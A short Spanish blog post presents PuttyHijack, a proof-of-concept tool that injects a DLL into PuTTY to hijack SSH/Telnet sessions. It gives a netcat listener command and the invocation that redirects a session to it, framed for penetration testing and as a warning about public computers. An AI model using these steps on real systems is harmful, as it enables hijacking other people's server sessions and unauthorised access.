PuttyHijack

Esta tool llamada PuttyHijack Su descripción dice mas que mil palabras

““PuttyHijack is a POC tool that injects a dll into the Putty process to hijack an existing, or soon to be created, connection. This can be useful during penetration tests when a windows box that has been compromised is used to SSH/Telnet into other servers.”””

Requerimientos

Windows Machine

Netcat

Putty

PuttyHijack

##Manos a la obra

nc -vv -lp 6666 <<<No Requiere Explicación oh si?

putty.exe cualquier server

PuttyHijack.exe 127.0.0.1 6666

Después de esto estoy seguro que lo pensaran antes de conectarse a sus servidores usando Putty desde cualquier Cyber Cafe

Anexo Screen

PuttyHijack